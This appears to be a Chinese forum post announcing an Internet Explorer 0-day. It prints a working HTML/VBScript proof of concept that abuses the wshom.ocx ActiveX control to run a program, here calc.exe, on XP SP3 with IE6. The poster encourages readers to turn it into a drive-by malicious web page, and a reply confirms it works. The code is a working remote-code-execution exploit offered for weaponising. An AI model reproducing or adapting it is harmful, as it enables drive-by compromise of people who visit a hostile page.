又一个IE的最新0DAY(IE浏览器wshom.ocx ActiveX控件远程代码执行)
这段代码在SP3+IE6下测试成功
测试代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
<html> <p align="left"><b><font face="Segoe Script" size="7">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font></b></p> <p> <object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target' ></object> <script language='vbscript'> arg1="c:\WINDOWS\system32\calc.exe" target.Exec arg1 </script></p> |
有兴趣的同学可以回去搞一下,弄个网马出来!
流浪的风
很强大,还真能跳出计算器呢,看来IE还真不安全。。。